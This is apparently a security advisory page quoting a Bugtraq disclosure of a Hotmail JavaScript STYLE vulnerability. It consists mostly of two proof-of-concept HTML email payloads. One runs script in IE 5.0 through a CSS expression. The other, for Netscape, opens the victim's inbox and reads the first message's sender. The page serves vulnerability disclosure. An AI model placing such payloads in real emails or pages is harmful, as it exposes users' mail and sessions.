• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Hotmail Javascript STYLE Vulnerability

From Georgi Guninski's <joro@nat.bg> post to Bugtraq:

The code that must be embeded in a HTML email message is:
For IE 5.0:

<P STYLE="left:expression(eval('alert(\'JavaScript is
executed\');window.close()'))" >

For Netscape Communicator:

<STYLE TYPE="text/javascript">
alert('JavaScript is executed');
a=window.open(document.links[2]);
setTimeout('alert(\'The first message in your Inbox is from:
\'+a.document.links[26].text)',20000);
</STYLE>